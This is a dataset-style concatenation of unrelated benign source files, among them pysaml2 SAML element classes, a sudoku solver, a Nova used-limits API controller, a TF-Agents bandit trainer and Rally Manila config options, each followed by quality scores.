self.decision = decision def authz_decision_statement_type__from_string(xml_string): return saml2.create_class_from_xml_string(AuthzDecisionStatementType_, xml_string) class AuthzDecisionStatement(AuthzDecisionStatementType_): """The 
urn:oasis:names:tc:SAML:2.0:assertion:AuthzDecisionStatement element """

    c_tag = 'AuthzDecisionStatement'
    c_namespace = NAMESPACE
    c_children = AuthzDecisionStatementType_.c_children.copy()
    c_attributes = AuthzDecisionStatementType_.c_attributes.copy()
    c_child_order = AuthzDecisionStatementType_.c_child_order[:]
    c_cardinality = AuthzDecisionStatementType_.c_cardinality.copy()


def authz_decision_statement_from_string(xml_string):
    return saml2.create_class_from_xml_string(AuthzDecisionStatement,
                                              xml_string)


#..................
# ['Assertion', 'AssertionType', 'AdviceType', 'Advice']
class AssertionType_(SamlBase):
    """The urn:oasis:names:tc:SAML:2.0:assertion:AssertionType element """

    c_tag = 'AssertionType'
    c_namespace = NAMESPACE
    c_children = SamlBase.c_children.copy()
    c_attributes = SamlBase.c_attributes.copy()
    c_child_order = SamlBase.c_child_order[:]
    c_cardinality = SamlBase.c_cardinality.copy()
    c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Issuer'] = (
        'issuer', Issuer)
    c_children['{http://www.w3.org/2000/09/xmldsig#}Signature'] = (
        'signature', ds.Signature)
    c_cardinality['signature'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Subject'] = (
        'subject', Subject)
    c_cardinality['subject'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Conditions'] = (
        'conditions', Conditions)
    c_cardinality['conditions'] = {"min": 0, "max": 1}
    c_cardinality['advice'] = {"min": 0, "max": 1}
    c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Statement'] = (
        'statement', [Statement])
    c_cardinality['statement'] = {"min": 0}
    c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnStatement'] = (
        'authn_statement', [AuthnStatement])
    c_cardinality['authn_statement'] = {"min": 0}
    c_children[
        '{urn:oasis:names:tc:SAML:2.0:assertion}AuthzDecisionStatement'] = (
        'authz_decision_statement', [AuthzDecisionStatement])
    c_cardinality['authz_decision_statement'] = {"min": 0}
    c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AttributeStatement'] = (
        'attribute_statement', [AttributeStatement])
    c_cardinality['attribute_statement'] = {"min": 0}
    c_attributes['Version'] = ('version', 'string', True)
    c_attributes['ID'] = ('id', 'ID', True)
    c_attributes['IssueInstant'] = ('issue_instant', 'dateTime', True)
    c_child_order.extend(['issuer', 'signature', 'subject', 'conditions',
                          'advice', 'statement', 'authn_statement',
                          'authz_decision_statement', 'attribute_statement'])

    def __init__(self, issuer=None, signature=None, subject=None,
                 conditions=None, advice=None, statement=None,
                 authn_statement=None, authz_decision_statement=None,
                 attribute_statement=None, version=None, id=None,
                 issue_instant=None, text=None, extension_elements=None,
                 extension_attributes=None):
        SamlBase.__init__(self, text=text,
                          extension_elements=extension_elements,
                          extension_attributes=extension_attributes)
        self.issuer = issuer
        self.signature = signature
        self.subject = subject
        self.conditions = conditions
        self.advice = advice
        self.statement = statement or []
        self.authn_statement = authn_statement or []
        self.authz_decision_statement = authz_decision_statement or []
        self.attribute_statement = attribute_statement or []
        self.version = version
        self.id = id
        self.issue_instant = issue_instant

    def verify(self):
        # an assertion that contains no statements MUST contain a Subject
        if self.attribute_statement or self.statement or \
                self.authn_statement or self.authz_decision_statement:
            pass
        elif not self.subject:
            raise MustValueError(
                "An Assertion with no statements must contain a Subject")
        if self.authn_statement and not self.subject:
            raise
MustValueError( "An assertion with an AuthnStatement must contain a Subject") return SamlBase.verify(self) def assertion_type__from_string(xml_string): return saml2.create_class_from_xml_string(AssertionType_, xml_string) class Assertion(AssertionType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Assertion element """ c_tag = 'Assertion' c_namespace = NAMESPACE c_children = AssertionType_.c_children.copy() c_attributes = AssertionType_.c_attributes.copy() c_child_order = AssertionType_.c_child_order[:] c_cardinality = AssertionType_.c_cardinality.copy() def assertion_from_string(xml_string): return saml2.create_class_from_xml_string(Assertion, xml_string) class AdviceType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AdviceType element """ c_tag = 'AdviceType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionIDRef'] = ( 'assertion_id_ref', [AssertionIDRef]) c_cardinality['assertion_id_ref'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AssertionURIRef'] = ( 'assertion_uri_ref', [AssertionURIRef]) c_cardinality['assertion_uri_ref'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Assertion'] = ( 'assertion', [Assertion]) c_cardinality['assertion'] = {"min": 0} c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedAssertion'] = ( 'encrypted_assertion', [EncryptedAssertion]) c_cardinality['encrypted_assertion'] = {"min": 0} c_child_order.extend(['assertion_id_ref', 'assertion_uri_ref', 'assertion', 'encrypted_assertion']) c_any = {"namespace": "##other", "processContents": "lax"} def __init__(self, assertion_id_ref=None, assertion_uri_ref=None, assertion=None, encrypted_assertion=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.assertion_id_ref = assertion_id_ref or [] self.assertion_uri_ref = assertion_uri_ref or [] self.assertion = assertion or [] self.encrypted_assertion = encrypted_assertion or [] def advice_type__from_string(xml_string): return saml2.create_class_from_xml_string(AdviceType_, xml_string) class Advice(AdviceType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Advice element """ c_tag = 'Advice' c_namespace = NAMESPACE c_children = AdviceType_.c_children.copy() c_attributes = AdviceType_.c_attributes.copy() c_child_order = AdviceType_.c_child_order[:] c_cardinality = AdviceType_.c_cardinality.copy() def advice_from_string(xml_string): return saml2.create_class_from_xml_string(Advice, xml_string) # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ EvidenceType_.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Assertion'] = ( 'assertion', [Assertion]) Evidence.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Assertion'] = ( 'assertion', [Assertion]) AssertionType_.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Advice'] = ( 'advice', Advice) Assertion.c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Advice'] = ( 'advice', Advice) # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ AG_IDNameQualifiers = [ ('NameQualifier', 'string', False), ('SPNameQualifier', 'string', False), ] ELEMENT_FROM_STRING = { BaseID.c_tag: base_id_from_string, NameID.c_tag: name_id_from_string, NameIDType_.c_tag: name_id_type__from_string, 
EncryptedElementType_.c_tag: encrypted_element_type__from_string, EncryptedID.c_tag: encrypted_id_from_string, Issuer.c_tag: issuer_from_string, AssertionIDRef.c_tag: assertion_id_ref_from_string, AssertionURIRef.c_tag: assertion_uri_ref_from_string, Assertion.c_tag: assertion_from_string, AssertionType_.c_tag: assertion_type__from_string, Subject.c_tag: subject_from_string, SubjectType_.c_tag: subject_type__from_string, SubjectConfirmation.c_tag: subject_confirmation_from_string, SubjectConfirmationType_.c_tag: subject_confirmation_type__from_string, SubjectConfirmationData.c_tag: subject_confirmation_data_from_string, SubjectConfirmationDataType_.c_tag: subject_confirmation_data_type__from_string, KeyInfoConfirmationDataType_.c_tag: key_info_confirmation_data_type__from_string, Conditions.c_tag: conditions_from_string, ConditionsType_.c_tag: conditions_type__from_string, Condition.c_tag: condition_from_string, AudienceRestriction.c_tag: audience_restriction_from_string, AudienceRestrictionType_.c_tag: audience_restriction_type__from_string, Audience.c_tag: audience_from_string, OneTimeUse.c_tag: one_time_use_from_string, OneTimeUseType_.c_tag: one_time_use_type__from_string, ProxyRestriction.c_tag: proxy_restriction_from_string, ProxyRestrictionType_.c_tag: proxy_restriction_type__from_string, Advice.c_tag: advice_from_string, AdviceType_.c_tag: advice_type__from_string, EncryptedAssertion.c_tag: encrypted_assertion_from_string, Statement.c_tag: statement_from_string, AuthnStatement.c_tag: authn_statement_from_string, AuthnStatementType_.c_tag: authn_statement_type__from_string, SubjectLocality.c_tag: subject_locality_from_string, SubjectLocalityType_.c_tag: subject_locality_type__from_string, AuthnContext.c_tag: authn_context_from_string, AuthnContextType_.c_tag: authn_context_type__from_string, AuthnContextClassRef.c_tag: authn_context_class_ref_from_string, AuthnContextDeclRef.c_tag: authn_context_decl_ref_from_string, AuthnContextDecl.c_tag: authn_context_decl_from_string, AuthenticatingAuthority.c_tag: authenticating_authority_from_string, AuthzDecisionStatement.c_tag: authz_decision_statement_from_string, AuthzDecisionStatementType_.c_tag: authz_decision_statement_type__from_string, DecisionType_.c_tag: decision_type__from_string, Action.c_tag: action_from_string, ActionType_.c_tag: action_type__from_string, Evidence.c_tag: evidence_from_string, EvidenceType_.c_tag: evidence_type__from_string, AttributeStatement.c_tag: attribute_statement_from_string, AttributeStatementType_.c_tag: attribute_statement_type__from_string, Attribute.c_tag: attribute_from_string, AttributeType_.c_tag: attribute_type__from_string, AttributeValue.c_tag: attribute_value_from_string, EncryptedAttribute.c_tag: encrypted_attribute_from_string, } ELEMENT_BY_TAG = { 'BaseID': BaseID, 'NameID': NameID, 'NameIDType': NameIDType_, 'EncryptedElementType': EncryptedElementType_, 'EncryptedID': EncryptedID, 'Issuer': Issuer, 'AssertionIDRef': AssertionIDRef, 'AssertionURIRef': AssertionURIRef, 'Assertion': Assertion, 'AssertionType': AssertionType_, 'Subject': Subject, 'SubjectType': SubjectType_, 'SubjectConfirmation': SubjectConfirmation, 'SubjectConfirmationType': SubjectConfirmationType_, 'SubjectConfirmationData': SubjectConfirmationData, 'SubjectConfirmationDataType': SubjectConfirmationDataType_, 'KeyInfoConfirmationDataType': KeyInfoConfirmationDataType_, 'Conditions': Conditions, 'ConditionsType': ConditionsType_, 'Condition': Condition, 'AudienceRestriction': AudienceRestriction, 'AudienceRestrictionType': 
AudienceRestrictionType_, 'Audience': Audience, 'OneTimeUse': OneTimeUse, 'OneTimeUseType': OneTimeUseType_, 'ProxyRestriction': ProxyRestriction, 'ProxyRestrictionType': ProxyRestrictionType_, 'Advice': Advice, 'AdviceType': AdviceType_, 'EncryptedAssertion': EncryptedAssertion, 'Statement': Statement, 'AuthnStatement': AuthnStatement, 'AuthnStatementType': AuthnStatementType_, 'SubjectLocality': SubjectLocality, 'SubjectLocalityType': SubjectLocalityType_, 'AuthnContext': AuthnContext, 'AuthnContextType': AuthnContextType_, 'AuthnContextClassRef': AuthnContextClassRef, 'AuthnContextDeclRef': AuthnContextDeclRef, 'AuthnContextDecl': AuthnContextDecl, 'AuthenticatingAuthority': AuthenticatingAuthority, 'AuthzDecisionStatement': AuthzDecisionStatement, 'AuthzDecisionStatementType': AuthzDecisionStatementType_, 'DecisionType': DecisionType_, 'Action': Action, 'ActionType': ActionType_, 'Evidence': Evidence, 'EvidenceType': EvidenceType_, 'AttributeStatement': AttributeStatement, 'AttributeStatementType': AttributeStatementType_, 'Attribute': Attribute, 'AttributeType': AttributeType_, 'AttributeValue': AttributeValue, 'EncryptedAttribute': EncryptedAttribute, 'BaseIDAbstractType': BaseIDAbstractType_, 'ConditionAbstractType': ConditionAbstractType_, 'StatementAbstractType': StatementAbstractType_, } def factory(tag, **kwargs): return ELEMENT_BY_TAG[tag](**kwargs)
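

# --- Editor's sketch (not part of the generated module) --------------------
# A hedged illustration of how the element classes above compose and
# round-trip through their *_from_string helpers. The attribute name "uid"
# and all values are hypothetical placeholders, and the snippet assumes
# SamlBase exposes a to_string() serializer, as pysaml2's base class does.
if __name__ == "__main__":
    attr = Attribute(
        name="uid",  # hypothetical attribute name
        name_format=NAME_FORMAT_URI,
        attribute_value=[AttributeValue(text="jdoe")],
    )
    stmt = AttributeStatement(attribute=[attr])
    # serialize to XML, then parse back with the matching helper
    xml = stmt.to_string()  # assumed SamlBase method returning the XML
    parsed = attribute_statement_from_string(xml)
    assert parsed.attribute[0].name == "uid"
    # factory() offers tag-based construction over ELEMENT_BY_TAG
    name_id = factory('NameID', format=NAMEID_FORMAT_TRANSIENT, text="abc123")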
1.820313
2
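A hedged usage sketch for the tag-based factory closing the record above; the module name "saml" and the keyword argument are illustrative assumptions, not taken from the source:

# Sketch: instantiating a generated element class by tag name.
import saml  # placeholder name for the module defined above

issuer = saml.factory('Issuer', text='https://idp.example.org')
assert isinstance(issuer, saml.Issuer)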
ROS_packages/custom_ROS_envs/turtlebot2_maze_env/src/turtlebot2_maze_random.py
PierreExeter/custom_gym_envs
1
1864
<reponame>PierreExeter/custom_gym_envs<filename>ROS_packages/custom_ROS_envs/turtlebot2_maze_env/src/turtlebot2_maze_random.py<gh_stars>1-10 #!/usr/bin/env python import gym import rospy from openai_ros.openai_ros_common import StartOpenAI_ROS_Environment # initialise environment rospy.init_node('turtlebot2_maze_random', anonymous=True, log_level=rospy.WARN) task_and_robot_environment_name = rospy.get_param('/turtlebot2/task_and_robot_environment_name') env = StartOpenAI_ROS_Environment(task_and_robot_environment_name) print("Environment: ", env) print("Action space: ", env.action_space) # print(env.action_space.high) # print(env.action_space.low) print("Observation space: ", env.observation_space) print(env.observation_space.high) print(env.observation_space.low) for episode in range(20): env.reset() for t in range(100): action = env.action_space.sample() obs, reward, done, info = env.step(action) print("episode: ", episode) print("timestep: ", t) print("obs: ", obs) print("action:", action) print("reward: ", reward) print("done: ", done) print("info: ", info) if done: print("Episode {} finished after {} timesteps".format(episode, t+1)) break env.close()
2.21875
2
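The rollout above prints per-step values but discards the episode return; a minimal variant using the same gym API already imported by the script:

# Sketch: same random-agent loop, accumulating the return per episode.
for episode in range(20):
    env.reset()
    episode_return = 0.0
    for t in range(100):
        obs, reward, done, info = env.step(env.action_space.sample())
        episode_return += reward
        if done:
            break
    print("episode %d finished: return %.2f" % (episode, episode_return))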
solver.py
jacobchh/Sudoku-Solver
1
1865
import numpy as np board = np.zeros(shape=(9, 9)) count = 0 def solve(): global count count += 1 if count % 1000 == 0: print('\rCurrent number of computations made:', count, end='') freePos = find() if freePos is None: return True i = freePos[0] j = freePos[1] for w in range(1, 10): if possible(w, freePos): board[i][j] = w if solve(): return True board[i][j] = 0 return False def find(): for i in range(9): for j in range(9): if board[i][j] == 0: return [i, j] return None def possible(value, position): # position = (i, j) tuple i = position[0] j = position[1] # checks row and column for repeat value if (value in board[:, j]) or (value in board[i]): return False # reset to i,j - top left square i = (i // 3) * 3 j = (j // 3) * 3 # check all squares in square for n in range(i, i + 3): for m in range(j, j + 3): if board[n][m] == value: return False return True def change(position): # position = (i, j) tuple i = position[0] j = position[1] for w in range(1, 10): if w not in board[:, j] and w not in board[i]: board[i][j] = w return True return False def initialize(): print("Please enter the values on the board starting from left to right, top to bottom, 0 for blank") integerChunk = input("Numbers: ") pos = 0 for i in range(9): for j in range(9): board[i][j] = int(integerChunk[pos]) pos += 1 def displayBoard(): for i in range(3): for j in range(9): if board[i][j] == 0: print(" ", end="") else: print("%d " % board[i][j], end="") if (j == 2) or (j == 5): print("| ", end="") if j == 8: print("") print("- - - - - - - - - - -") for i in range(3, 6): for j in range(9): if board[i][j] == 0: print(" ", end="") else: print("%d " % board[i][j], end="") if (j == 2) or (j == 5): print("| ", end="") if j == 8: print("") print("- - - - - - - - - - -") for i in range(6, 9): for j in range(9): if board[i][j] == 0: print(" ", end="") else: print("%d " % board[i][j], end="") if (j == 2) or (j == 5): print("| ", end="") if j == 8: print("") def main(): initialize() print("Is this the correct board? Press enter to continue or 'q' to exit program.") displayBoard() response = input() if response == "q": exit() print("---------------SOLVING---------------\n") solve() print("\r\rSOLUTION") displayBoard() print("\nTotal number of computations:", count) if __name__ == "__main__": main()
3.46875
3
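The solver above is driven interactively through initialize(); a non-interactive sketch that fills the module-level board directly (the 81-digit puzzle string is illustrative, 0 meaning blank):

# Sketch: load a puzzle string into `board`, then solve and display.
puzzle = ("530070000600195000098000060800060003"
          "400803001700020006060000280000419005000080079")
for pos, ch in enumerate(puzzle):
    board[pos // 9][pos % 9] = int(ch)
if solve():
    displayBoard()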
01_basics/01_building_expressions/02_vector_mat_soln.py
johny-c/theano_exercises
711
1866
<filename>01_basics/01_building_expressions/02_vector_mat_soln.py import numpy as np from theano import function import theano.tensor as T def make_vector(): """ Returns a new Theano vector. """ return T.vector() def make_matrix(): """ Returns a new Theano matrix. """ return T.matrix() def elemwise_mul(a, b): """ a: A theano matrix b: A theano matrix Returns the elementwise product of a and b """ return a * b def matrix_vector_mul(a, b): """ a: A theano matrix b: A theano vector Returns the matrix-vector product of a and b """ return T.dot(a, b) if __name__ == "__main__": a = make_vector() b = make_vector() c = elemwise_mul(a, b) d = make_matrix() e = matrix_vector_mul(d, c) f = function([a, b, d], e) rng = np.random.RandomState([1, 2, 3]) a_value = rng.randn(5).astype(a.dtype) b_value = rng.rand(5).astype(b.dtype) c_value = a_value * b_value d_value = rng.randn(5, 5).astype(d.dtype) expected = np.dot(d_value, c_value) actual = f(a_value, b_value, d_value) assert np.allclose(actual, expected) print("SUCCESS!")
3.0625
3
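For readers without Theano installed, the graph assembled in __main__ above computes an elementwise product followed by a matrix-vector product; the plain-numpy equivalent, with illustrative values:

# Sketch: numpy equivalent of elemwise_mul then matrix_vector_mul.
import numpy as np

m = np.array([[1.0, 0.0], [0.0, 2.0]])
v1 = np.array([3.0, 4.0])
v2 = np.array([0.5, 0.5])
print(np.dot(m, v1 * v2))  # elementwise product, then mat-vec -> [1.5 4.]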
nova/api/openstack/compute/used_limits.py
bopopescu/nova-8
0
1867
# Copyright 2012 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.api.openstack import api_version_request from nova.api.openstack.api_version_request \ import MIN_WITHOUT_PROXY_API_SUPPORT_VERSION from nova.api.openstack import extensions from nova.api.openstack import wsgi from nova.policies import used_limits as ul_policies from nova import quota QUOTAS = quota.QUOTAS class UsedLimitsController(wsgi.Controller): @staticmethod def _reserved(req): try: return int(req.GET['reserved']) except (ValueError, KeyError): return False @wsgi.extends @extensions.expected_errors(()) def index(self, req, resp_obj): context = req.environ['nova.context'] project_id = self._project_id(context, req) quotas = QUOTAS.get_project_quotas(context, project_id, usages=True) if api_version_request.is_supported( req, min_version=MIN_WITHOUT_PROXY_API_SUPPORT_VERSION): quota_map = { 'totalRAMUsed': 'ram', 'totalCoresUsed': 'cores', 'totalInstancesUsed': 'instances', 'totalServerGroupsUsed': 'server_groups', } else: quota_map = { 'totalRAMUsed': 'ram', 'totalCoresUsed': 'cores', 'totalInstancesUsed': 'instances', 'totalFloatingIpsUsed': 'floating_ips', 'totalSecurityGroupsUsed': 'security_groups', 'totalServerGroupsUsed': 'server_groups', } used_limits = {} for display_name, key in quota_map.items(): if key in quotas: reserved = (quotas[key]['reserved'] if self._reserved(req) else 0) used_limits[display_name] = quotas[key]['in_use'] + reserved resp_obj.obj['limits']['absolute'].update(used_limits) def _project_id(self, context, req): if 'tenant_id' in req.GET: tenant_id = req.GET.get('tenant_id') target = { 'project_id': tenant_id, 'user_id': context.user_id } context.can(ul_policies.BASE_POLICY_NAME, target) return tenant_id return context.project_id
1.835938
2
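A self-contained illustration of the accumulation performed in index() above, using a made-up quota payload (field names mirror the source; the values are invented):

# Sketch: used limit = in_use + reserved, keyed through quota_map.
quotas = {'ram': {'in_use': 2048, 'reserved': 512},
          'cores': {'in_use': 4, 'reserved': 0}}
quota_map = {'totalRAMUsed': 'ram', 'totalCoresUsed': 'cores'}
used_limits = {name: quotas[key]['in_use'] + quotas[key]['reserved']
               for name, key in quota_map.items() if key in quotas}
print(used_limits)  # {'totalRAMUsed': 2560, 'totalCoresUsed': 4}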
tf_agents/bandits/agents/examples/v2/trainer.py
howards11/agents
3,175
1868
<reponame>howards11/agents<filename>tf_agents/bandits/agents/examples/v2/trainer.py # coding=utf-8 # Copyright 2020 The TF-Agents Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. r"""Generic TF-Agents training function for bandits.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os from absl import logging import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import from tf_agents.drivers import dynamic_step_driver from tf_agents.eval import metric_utils from tf_agents.metrics import tf_metrics from tf_agents.policies import policy_saver from tf_agents.replay_buffers import tf_uniform_replay_buffer tf = tf.compat.v2 AGENT_CHECKPOINT_NAME = 'agent' STEP_CHECKPOINT_NAME = 'step' CHECKPOINT_FILE_PREFIX = 'ckpt' def get_replay_buffer(data_spec, batch_size, steps_per_loop): """Return a `TFUniformReplayBuffer` for the given `agent`.""" buf = tf_uniform_replay_buffer.TFUniformReplayBuffer( data_spec=data_spec, batch_size=batch_size, max_length=steps_per_loop) return buf def set_expected_shape(experience, num_steps): def set_time_dim(input_tensor, steps): tensor_shape = input_tensor.shape.as_list() tensor_shape[1] = steps input_tensor.set_shape(tensor_shape) tf.nest.map_structure(lambda t: set_time_dim(t, num_steps), experience) def get_training_loop_fn(driver, replay_buffer, agent, steps): """Returns a `tf.function` that runs the driver and training loops. Args: driver: an instance of `Driver`. replay_buffer: an instance of `ReplayBuffer`. agent: an instance of `TFAgent`. steps: an integer indicating how many driver steps should be executed and presented to the trainer during each training loop. """ def training_loop(): """Returns a `tf.function` that runs the training loop.""" driver.run() batch_size = driver.env.batch_size dataset = replay_buffer.as_dataset( sample_batch_size=batch_size, num_steps=steps, single_deterministic_pass=True) experience, unused_info = tf.data.experimental.get_single_element(dataset) set_expected_shape(experience, steps) loss_info = agent.train(experience) replay_buffer.clear() return loss_info return training_loop def restore_and_get_checkpoint_manager(root_dir, agent, metrics, step_metric): """Restores from `root_dir` and returns a function that writes checkpoints.""" trackable_objects = {metric.name: metric for metric in metrics} trackable_objects[AGENT_CHECKPOINT_NAME] = agent trackable_objects[STEP_CHECKPOINT_NAME] = step_metric checkpoint = tf.train.Checkpoint(**trackable_objects) checkpoint_manager = tf.train.CheckpointManager(checkpoint=checkpoint, directory=root_dir, max_to_keep=5) latest = checkpoint_manager.latest_checkpoint if latest is not None: logging.info('Restoring checkpoint from %s.', latest) checkpoint.restore(latest) logging.info('Successfully restored to step %s.', step_metric.result()) else: logging.info('Did not find a pre-existing checkpoint. 
' 'Starting from scratch.') return checkpoint_manager def train(root_dir, agent, environment, training_loops, steps_per_loop, additional_metrics=(), training_data_spec_transformation_fn=None): """Perform `training_loops` iterations of training. Checkpoint results. If one or more baseline_reward_fns are provided, the regret is computed against each one of them. Here is example baseline_reward_fn: def baseline_reward_fn(observation, per_action_reward_fns): rewards = ... # compute reward for each arm optimal_action_reward = ... # take the maximum reward return optimal_action_reward Args: root_dir: path to the directory where checkpoints and metrics will be written. agent: an instance of `TFAgent`. environment: an instance of `TFEnvironment`. training_loops: an integer indicating how many training loops should be run. steps_per_loop: an integer indicating how many driver steps should be executed and presented to the trainer during each training loop. additional_metrics: Tuple of metric objects to log, in addition to default metrics `NumberOfEpisodes`, `AverageReturnMetric`, and `AverageEpisodeLengthMetric`. training_data_spec_transformation_fn: Optional function that transforms the data items before they get to the replay buffer. """ # TODO(b/127641485): create evaluation loop with configurable metrics. if training_data_spec_transformation_fn is None: data_spec = agent.policy.trajectory_spec else: data_spec = training_data_spec_transformation_fn( agent.policy.trajectory_spec) replay_buffer = get_replay_buffer(data_spec, environment.batch_size, steps_per_loop) # `step_metric` records the number of individual rounds of bandit interaction; # that is, (number of trajectories) * batch_size. step_metric = tf_metrics.EnvironmentSteps() metrics = [ tf_metrics.NumberOfEpisodes(), tf_metrics.AverageEpisodeLengthMetric(batch_size=environment.batch_size) ] + list(additional_metrics) if isinstance(environment.reward_spec(), dict): metrics += [tf_metrics.AverageReturnMultiMetric( reward_spec=environment.reward_spec(), batch_size=environment.batch_size)] else: metrics += [ tf_metrics.AverageReturnMetric(batch_size=environment.batch_size)] if training_data_spec_transformation_fn is not None: add_batch_fn = lambda data: replay_buffer.add_batch( # pylint: disable=g-long-lambda training_data_spec_transformation_fn(data)) else: add_batch_fn = replay_buffer.add_batch observers = [add_batch_fn, step_metric] + metrics driver = dynamic_step_driver.DynamicStepDriver( env=environment, policy=agent.collect_policy, num_steps=steps_per_loop * environment.batch_size, observers=observers) training_loop = get_training_loop_fn( driver, replay_buffer, agent, steps_per_loop) checkpoint_manager = restore_and_get_checkpoint_manager( root_dir, agent, metrics, step_metric) train_step_counter = tf.compat.v1.train.get_or_create_global_step() saver = policy_saver.PolicySaver(agent.policy, train_step=train_step_counter) summary_writer = tf.summary.create_file_writer(root_dir) summary_writer.set_as_default() for i in range(training_loops): training_loop() metric_utils.log_metrics(metrics) for metric in metrics: metric.tf_summaries(train_step=step_metric.result()) checkpoint_manager.save() if i % 100 == 0: saver.save(os.path.join(root_dir, 'policy_%d' % step_metric.result()))
1.960938
2
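A standalone sketch exercising the same replay-buffer constructor that get_replay_buffer() wraps above; the scalar reward spec and the sizes are assumptions for illustration:

# Sketch: buffer sized as batch_size rows by max_length time steps.
import tensorflow as tf
from tf_agents.replay_buffers import tf_uniform_replay_buffer

spec = tf.TensorSpec(shape=(), dtype=tf.float32, name='reward')
buf = tf_uniform_replay_buffer.TFUniformReplayBuffer(
    data_spec=spec, batch_size=8, max_length=2)
print(buf.data_spec)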
rally_openstack/cfg/manila.py
RSE-Cambridge/rally-openstack
0
1869
<filename>rally_openstack/cfg/manila.py # Copyright 2013: Mirantis Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from rally.common import cfg OPTS = {"openstack": [ cfg.FloatOpt( "manila_share_create_prepoll_delay", default=2.0, deprecated_group="benchmark", help="Delay between creating Manila share and polling for its " "status."), cfg.FloatOpt( "manila_share_create_timeout", default=300.0, deprecated_group="benchmark", help="Timeout for Manila share creation."), cfg.FloatOpt( "manila_share_create_poll_interval", default=3.0, deprecated_group="benchmark", help="Interval between checks when waiting for Manila share " "creation."), cfg.FloatOpt( "manila_share_delete_timeout", default=180.0, deprecated_group="benchmark", help="Timeout for Manila share deletion."), cfg.FloatOpt( "manila_share_delete_poll_interval", default=2.0, deprecated_group="benchmark", help="Interval between checks when waiting for Manila share " "deletion."), cfg.FloatOpt( "manila_access_create_timeout", default=300.0, deprecated_group="benchmark", help="Timeout for Manila access creation."), cfg.FloatOpt( "manila_access_create_poll_interval", default=3.0, deprecated_group="benchmark", help="Interval between checks when waiting for Manila access " "creation."), cfg.FloatOpt( "manila_access_delete_timeout", default=180.0, deprecated_group="benchmark", help="Timeout for Manila access deletion."), cfg.FloatOpt( "manila_access_delete_poll_interval", default=2.0, deprecated_group="benchmark", help="Interval between checks when waiting for Manila access " "deletion."), ]}
1.648438
2
app/backend/app/crud/crud_register_invoice.py
matayoos/invoice-scrapper
0
1870
<gh_stars>0 from sqlalchemy.orm.session import Session from app import crud from .utils import insert, get_content def register_invoice(db: Session, url: str): content = get_content.get_invoice_info(url) grocery_store_id = insert.insert_grocery_store_info( db, obj_in=content["grocery_store"] ) invoice_id = insert.insert_invoice_info( db, obj_in=content["invoice"], grocery_store_id=grocery_store_id ) insert.insert_invoice_items(db, content["items"], grocery_store_id, invoice_id) return crud.get_invoice_by_id(db, id=invoice_id)
2.546875
3
examples/web/handlers.py
nicoddemus/aioworkers
45
1871
<reponame>nicoddemus/aioworkers<filename>examples/web/handlers.py async def handler(context): return await context.data
1.320313
1
tools/genapixml.py
garronej/linphone
0
1872
#!/usr/bin/python # Copyright (C) 2014 Belledonne Communications SARL # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import argparse import os import six import string import sys import xml.etree.ElementTree as ET import xml.dom.minidom as minidom import metadoc class CObject: def __init__(self, name): self.name = name.strip() self.briefDescription = '' self.detailedDescription = None self.deprecated = False self.briefDoc = None class CEnumValue(CObject): def __init__(self, name): CObject.__init__(self, name) self.value = None class CEnum(CObject): def __init__(self, name): CObject.__init__(self, name) self.values = [] self.associatedTypedef = None def addValue(self, value): self.values.append(value) class CStructMember(CObject): def __init__(self, name, t): CObject.__init__(self, name) self.ctype = t.strip() class CStruct(CObject): def __init__(self, name): CObject.__init__(self, name) self.members = [] self.associatedTypedef = None def addMember(self, member): self.members.append(member) class CTypedef(CObject): def __init__(self, name, definition): 